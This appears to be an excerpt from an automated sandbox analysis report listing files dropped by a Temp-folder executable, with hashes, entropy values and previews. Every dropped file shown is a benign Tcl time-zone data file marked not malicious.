                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Zaporozhye) {. {-9223372036854775808 8440 0 LMT}. {-2840149240 8400 0 +0220}. {-1441160400 7200 0 EET}. {-1247536800 10800 0 MSK}. {-894769200 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-826419600 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {638319600 14400 1 MSD}. {654649200 10800 0 MSK}. {670374000 10800 0 EEST}. {686091600 7200 0 EET}. {701820000 10800 1 EEST}. {71
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7055
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.732572949993817
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:k7tmcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAyzF76:kbRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:D9A3FAE7D9B5C9681D7A98BFACB6F57A
                                                                                                                                                                                                                                                                                                                                SHA1:11268DFEE6D2472B3D8615ED6D70B361521854A2
                                                                                                                                                                                                                                                                                                                                SHA-256:C920B4B7C160D8CEB8A08E33E5727B14ECD347509CABB1D6CDC344843ACF009A
                                                                                                                                                                                                                                                                                                                                SHA-512:7709778B82155FBF35151F9D436F3174C057EBF7927C48F841B1D8AF008EEA9BC181D862A57C436EC69A528FB8B9854D9E974FC9EEC4FFDFE983299102BCDFB1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Zurich) {. {-9223372036854775808 2048 0 LMT}. {-3675198848 1786 0 BMT}. {-2385246586 3600 0 CET}. {-904435200 7200 1 CEST}. {-891129600 3600 0 CET}. {-872985600 7200 1 CEST}. {-859680000 3600 0 CET}. {347151600 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {401850000 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 CET}. {638326800 7200 1 CEST}. {654656400 3600 0 CET}. {670381200 7200 1 CEST}. {686106000 3600 0 CET}. {701830800 7200 1 CEST}. {717555600 3600 0 CET}. {733280400 7200 1 CEST}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):165
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.848987525932415
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVxKL82wFVAIgoqyKL8p6wox6QavKL8i:SlSWB9IZaM3ymvKA2wFVAIgovKAUwR1O
                                                                                                                                                                                                                                                                                                                                MD5:2639233BCD0119FD601F55F2B6279443
                                                                                                                                                                                                                                                                                                                                SHA1:AADF9931DF78F5BC16ED4638947E77AE52E80CA1
                                                                                                                                                                                                                                                                                                                                SHA-256:846E203E4B40EA7DC1CB8633BF950A8173D7AA8073C186588CC086BC7C4A2BEE
                                                                                                                                                                                                                                                                                                                                SHA-512:8F571F2BBE4C60E240C4EBBB81D410786D1CB8AD0761A99ABB61DDB0811ACC92DCC2F765A7962B5C560B86732286356357D3F408CAC32AC1B2C1F8EAD4AEAEA6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:GB) $TZData(:Europe/London).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):170
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.860435123210029
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVxKL82wFVAIgoqyKL8p6w4b/h8QavKL8i:SlSWB9IZaM3ymvKA2wFVAIgovKAUw4bx
                                                                                                                                                                                                                                                                                                                                MD5:51335479044A047F5597F0F06975B839
                                                                                                                                                                                                                                                                                                                                SHA1:234CD9635E61E7D429C70E886FF9C9F707FEAF1F
                                                                                                                                                                                                                                                                                                                                SHA-256:FAC3B11B1F4DA9D68CCC193526C4E369E3FAA74F95C8BEE8BB9FAE014ACD5900
                                                                                                                                                                                                                                                                                                                                SHA-512:4E37EFDFBAFA5C517BE86195373D083FF4370C5031B35A735E3225E7B17A75899FAFFBDF0C8BCFCBC5DC2D037EE9465AD3ED7C0FA55992027DFD69618DC9918F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:GB-Eire) $TZData(:Europe/London).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):148
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.817383285510599
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqSsM4DvFVAIgexvqtwZ8RDMvn:SlSWB9IZaM3yF4FVAIgJtwZ8RQvn
                                                                                                                                                                                                                                                                                                                                MD5:D19DC8277A68AA289A361D28A619E0B0
                                                                                                                                                                                                                                                                                                                                SHA1:27F5F30CC2603E1BCB6270AF84E9512DADEEB055
                                                                                                                                                                                                                                                                                                                                SHA-256:5B90891127A65F7F3C94B44AA0204BD3F488F21326E098B197FB357C51845B66
                                                                                                                                                                                                                                                                                                                                SHA-512:B5DD9C2D55BDB5909A29FD386CF107B83F56CD9B9F979A5D3854B4112B7F8950F4E91FB86AF6556DCF583EE469470810F3F8FB6CCF04FDBD6625A4346D3CD728
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:GMT) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):150
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.868642878112439
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqSsM4DvFVAIgexvqtwe7/8RDMvn:SlSWB9IZaM3yF4FVAIgJtwI8RQvn
                                                                                                                                                                                                                                                                                                                                MD5:B5065CD8B1CB665DACDB501797AF5104
                                                                                                                                                                                                                                                                                                                                SHA1:0DB4E9AC6E38632302D9689A0A39632C2592F5C7
                                                                                                                                                                                                                                                                                                                                SHA-256:6FC1D3C727CD9386A11CAF4983A2FC06A22812FDC7752FBFA7A5252F92BB0E70
                                                                                                                                                                                                                                                                                                                                SHA-512:BBA1793CA3BBC768EC441210748098140AE820910036352F5784DD8B2DABA8303BA2E266CB923B500E8F90494D426E8BF115ACD0C000CD0C65896CE7A6AD9D66
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:GMT+0) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):150
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8553095447791055
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqSsM4DvFVAIgexvqtw4Hp8RDMvn:SlSWB9IZaM3yF4FVAIgJtw4J8RQvn
                                                                                                                                                                                                                                                                                                                                MD5:E71CDE5E33573E78E01F4B7AB19F5728
                                                                                                                                                                                                                                                                                                                                SHA1:C296752C449ED90AE20F5AEC3DC1D8F329C2274F
                                                                                                                                                                                                                                                                                                                                SHA-256:78C5044C723D21375A1154AE301F29D13698C82B3702042C8B8D1EFF20954078
                                                                                                                                                                                                                                                                                                                                SHA-512:6EBB39EF85DA70833F8B6CCD269346DC015743BC049F6F1B385625C5498F4E953A0CEDE76C60314EE671FE0F6EEB56392D62E0128F5B04BC68681F71718FE2BB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:GMT-0) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):149
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.843152601955343
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqSsM4DvFVAIgexvqtwPHp8RDMvn:SlSWB9IZaM3yF4FVAIgJtwvp8RQvn
                                                                                                                                                                                                                                                                                                                                MD5:FE666CDF1E9AA110A7A0AE699A708927
                                                                                                                                                                                                                                                                                                                                SHA1:0E7FCDA9B47BC1D5F4E0DFAD8A9E7B73D71DC9E3
                                                                                                                                                                                                                                                                                                                                SHA-256:0A883AFE54FAE0ED7D6535BDAB8A767488A491E6F6D3B7813CF76BB32FED4382
                                                                                                                                                                                                                                                                                                                                SHA-512:763591A47057D67E47906AD22270D589100A7380B6F9EAA9AFD9D6D1EE254BCB1471FEC43531C4196765B15F2E27AF9AAB5A688D1C88B45FE7EEA67B6371466E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:GMT0) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):154
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.869510201987464
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqSsM4DvFVAIgexvqtwE+FB5yRDMvn:SlSWB9IZaM3yF4FVAIgJtwE6BURQvn
                                                                                                                                                                                                                                                                                                                                MD5:F989F3DB0290B2126DA85D78B74E2061
                                                                                                                                                                                                                                                                                                                                SHA1:43A0A1737E1E3EF0501BB65C1E96CE4D0B5635FC
                                                                                                                                                                                                                                                                                                                                SHA-256:41A45FCB805DB6054CD1A4C7A5CFBF82668B3B1D0E44A6F54DFB819E4C71F68A
                                                                                                                                                                                                                                                                                                                                SHA-512:3EDB8D901E04798B566E6D7D72841C842803AE761BEF3DEF37B8CA481E79915A803F61360FA2F317D7BDCD913AF8F5BB14F404E80CFA4A34E4310055C1DF39F2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:Greenwich) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):106
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.860812879108152
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5/Lm/kXGm2OH1V9i:SlSWB9X5jmTm2OH1V8
                                                                                                                                                                                                                                                                                                                                MD5:3D99F2C6DADF5EEEA4965A04EB17B1BB
                                                                                                                                                                                                                                                                                                                                SHA1:8DF607A911ADF6A9DD67D786FC9198262F580312
                                                                                                                                                                                                                                                                                                                                SHA-256:2C83D64139BFB1115DA3F891C26DD53B86436771A30FB4DD7C8164B1C0D5BCDE
                                                                                                                                                                                                                                                                                                                                SHA-512:EDA863F3A85268BA7A8606E3DCB4D7C88B0681AD8C4CFA1249A22B184F83BFDE9855DD4E5CFC3A4692220E5BEFBF99ED10E13BD98DBCA37D6F29A10AB660EBE2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:HST) {. {-9223372036854775808 -36000 0 HST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):174
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.865313867650324
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8LizFVAIgN2qPJL/XF1p4WFKQ1n:SlSWB9IZaM3yWzFVAIgAML//p4wKi
                                                                                                                                                                                                                                                                                                                                MD5:D828C0668A439FEB9779589A646793F8
                                                                                                                                                                                                                                                                                                                                SHA1:1509415B72E2155725FB09615B3E0276F3A46E87
                                                                                                                                                                                                                                                                                                                                SHA-256:CF8BFEC73D36026955FA6F020F42B6360A64ED870A88C575A5AA0CD9756EF51B
                                                                                                                                                                                                                                                                                                                                SHA-512:0F864B284E48B993DD13296AF05AEB14EBE26AF32832058C1FC32FCCE78E85925A25D980052834035D37935FAAF1CB0A9579AECBE6ADCDB2791A134D88204EBF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Hong_Kong)]} {. LoadTimeZoneFile Asia/Hong_Kong.}.set TZData(:Hongkong) $TZData(:Asia/Hong_Kong).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):185
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.840758003302018
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqLGsA/8rtdVAIgvMGsA/8rN6+GAKyx/2RQqGsA/8ru:SlSWB9IZaM3yj6dVAIgv1b+XZx+RQj7
                                                                                                                                                                                                                                                                                                                                MD5:18DEAAAC045B4F103F2D795E0BA77B00
                                                                                                                                                                                                                                                                                                                                SHA1:F3B3FE5029355173CD5BA626E075BA73F3AC1DC6
                                                                                                                                                                                                                                                                                                                                SHA-256:9BB28A38329767A22CD073DF34E46D0AA202172A4116FBF008DDF802E60B743B
                                                                                                                                                                                                                                                                                                                                SHA-512:18140274318E913F0650D21107B74C07779B832C9906F1A2E98433B96AAEADF70D07044EB420A2132A6833EF7C3887B8927CFD40D272A13E69C74A63904F43C9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Atlantic/Reykjavik)]} {. LoadTimeZoneFile Atlantic/Reykjavik.}.set TZData(:Iceland) $TZData(:Atlantic/Reykjavik).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):185
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.75703014401897
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsVVMMvwVAIgNGExVMSt+L6EL/liEi2eDcVVMMv:SlSWB9IZaM3y7VcVAIgNTxL+LzM2eDkr
                                                                                                                                                                                                                                                                                                                                MD5:1E84F531F7992BFBD53B87831FE349E9
                                                                                                                                                                                                                                                                                                                                SHA1:E46777885945B7C151C6D46C8F7292FC332A5576
                                                                                                                                                                                                                                                                                                                                SHA-256:F4BDCAE4336D22F7844BBCA933795063FA1BCA9EB228C7A4D8222BB07A706427
                                                                                                                                                                                                                                                                                                                                SHA-512:545D6DEB94B7A13D69F387FE758C9FC474DC02703F2D485FD42539D3CE03975CDEEFB985E4AA7742957952AF9E9F1E2DB84389277C3864C32C31D890BD399FB9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Indian/Antananarivo) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):173
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.802684724729281
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5+L6EL9WJxwFFkXGm2OHi/FvvUcfJ7XH0VQGFr6VVFSTL:SlSWB9X5+LxWJxwFJm2OHqFvd+VQSr6e
                                                                                                                                                                                                                                                                                                                                MD5:4618C8D4F26C02A3A303DD1FB5DCFE46
                                                                                                                                                                                                                                                                                                                                SHA1:857D376F5AFE75784E7F578C83E111B2EE18F74E
                                                                                                                                                                                                                                                                                                                                SHA-256:94262B5A1E3423CD26BFFB3E36F63C1A6880304D00EE5B05985072D82032C765
                                                                                                                                                                                                                                                                                                                                SHA-512:3F5CDDE3D2D5C8BC3DD6423888D7DB6A8EA3D4881ABE9E3857B9D0DDF756D0ECD9CAB7EF66343B0636D32E5CCF0ECEC1F56B9F4BC521CD24B3DB1D935F994AF0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Chagos) {. {-9223372036854775808 17380 0 LMT}. {-1988167780 18000 0 +05}. {820436400 21600 0 +06}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):148
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.911693487750565
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5+L6EL9FBIEW3v/kXGm2OHAWMx5vXTLyvMVSYvC:SlSWB9X5+LxpW3vTm2OHAnx5PTIMVSYK
                                                                                                                                                                                                                                                                                                                                MD5:5026A59BD9CCD6ABA665B4895EDB0171
                                                                                                                                                                                                                                                                                                                                SHA1:8361778F615EFDDAA660E49545249005B6FC66C3
                                                                                                                                                                                                                                                                                                                                SHA-256:37E1DAD2B019CCD6F8927602B079AD6DB7D71F55CBDA165B0A3EEF580B86DACF
                                                                                                                                                                                                                                                                                                                                SHA-512:E081BDE3FC0D07E75C83C308A662C3A1837A387137BFA8D8E4A59797159F465654BAFFCE6B1458602255BD784CEE0BF70F542C3E893BC87A566630D54084CDCC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Christmas) {. {-9223372036854775808 25372 0 LMT}. {-2364102172 25200 0 +07}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):146
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.811431467315532
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5+L6EL9d/FkXGm2OHGXTvxoevXmVUXxXW5d6TW8C:SlSWB9X5+LxpJm2OHGXCeP3BG5Uq
                                                                                                                                                                                                                                                                                                                                MD5:4C9502EC642E813E7B699281DD9809DF
                                                                                                                                                                                                                                                                                                                                SHA1:98804A95F13CF4EED983AC019CD1A9EFC01AF719
                                                                                                                                                                                                                                                                                                                                SHA-256:E8C591860DD42374C64E30850A3626017989CF16DDB85FDCC111AD92BD311425
                                                                                                                                                                                                                                                                                                                                SHA-512:8BD7718055789FA7CFB2D50270C563E4D69E16283745701B07073A1CDA271F95B1884F297C2F22CB36EC9983BC759F03B05B39DFD0604CD3278DBCBFB6E12CA6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Cocos) {. {-9223372036854775808 23260 0 LMT}. {-2209012060 23400 0 +0630}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.775639640601132
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsVVMMvwVAIgNGExVMSt+L6EL9TKlBx+DcVVMMv:SlSWB9IZaM3y7VcVAIgNTxL+LxGV+Dkr
                                                                                                                                                                                                                                                                                                                                MD5:DAD21C1CD103E6FF24ECB26ECC6CC783
                                                                                                                                                                                                                                                                                                                                SHA1:FBCCCF55EDFC882B6CB003E66B0B7E52A3E0EFDE
                                                                                                                                                                                                                                                                                                                                SHA-256:DA2F64ADC2674BE934C13992652F285927D8A44504327950678AD3B3EC285DCE
                                                                                                                                                                                                                                                                                                                                SHA-512:EA3B155D39D34AFB789F486FAA5F2B327ADB62E43FE5757D353810F9287D9E706773A034D3B2E5F050CCC2A24B31F28A8C44109CCCF43509F2B8547D107FD4A4
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Indian/Comoro) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):143
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.822244827214297
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5+L6EL12hJFkXGm2OHvdFFr9vM0VQL:SlSWB9X5+L5Mm2OHlFFr1nVQL
                                                                                                                                                                                                                                                                                                                                MD5:5223EC10BCFBC18A9FA392340530E164
                                                                                                                                                                                                                                                                                                                                SHA1:A59B4F19A3F052B2A3EB57E0D2652E81FB665B50
                                                                                                                                                                                                                                                                                                                                SHA-256:17750D6A9B8ED41809D8DC976777A5252CCB70F39C3BF396B55557A8E504CB09
                                                                                                                                                                                                                                                                                                                                SHA-512:2B2EFC470FE4461F82B1F1909C2A953934938D5DC8B54B2DA3A48678CF23ECD7874187E0FA4F6241FC02AEE0AF29B861C3FEEC15BB90E5C7D3A609DBB50EDC2C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Kerguelen) {. {-9223372036854775808 0 0 -00}. {-631152000 18000 0 +05}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):143
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.873998321422911
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5+L6ELzJMyFkXGm2OHuVdF+YvXTW1U9VsRYvC:SlSWB9X5+L/TJm2OHWgYPhSQC
                                                                                                                                                                                                                                                                                                                                MD5:F8D00BD4AD23557FB4FC8EB095842C26
                                                                                                                                                                                                                                                                                                                                SHA1:AD4AE41D0AD49E80FCF8CADE6889459EA30B57F7
                                                                                                                                                                                                                                                                                                                                SHA-256:997C33DBCEA54DE671A4C4E0E6F931623BF4F39A821F9F15075B9ECCCCA3F1B8
                                                                                                                                                                                                                                                                                                                                SHA-512:F67D348ECCCA244681EE7B70F7815593CFB2D7D4502832B2EB653EBF01AC66ACED29F7EA2E223D295C4D4F64287D372070EF863CCB201ACD8DF470330812013D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Mahe) {. {-9223372036854775808 13308 0 LMT}. {-2006653308 14400 0 +04}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):176
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.833774224054436
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5+L6ELzEyFkXGm2OHnz8evXZT5lxGYUQwGN0VQL:SlSWB9X5+L/EyJm2OHnz8ePZT5rG5QwI
                                                                                                                                                                                                                                                                                                                                MD5:EC0C456538BE81FA83AF440948EED55E
                                                                                                                                                                                                                                                                                                                                SHA1:11D7BA32A38547AF88F4182B6C1C3373AD89D75C
                                                                                                                                                                                                                                                                                                                                SHA-256:18A4B14CD05E4B25431BAF7BFCF2049491BF4E36BB31846D7F18F186C9ECD019
                                                                                                                                                                                                                                                                                                                                SHA-512:FF57F9EDFAD16E32B6A0BA656C5949A0A664D22001D5149BF036C322AEC1682E8B523C8E64E5A49B7EFA535A13459234C16237C09FC5B40F08AC22D56681C4BE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Maldives) {. {-9223372036854775808 17640 0 LMT}. {-2840158440 17640 0 MMT}. {-315636840 18000 0 +05}.}.
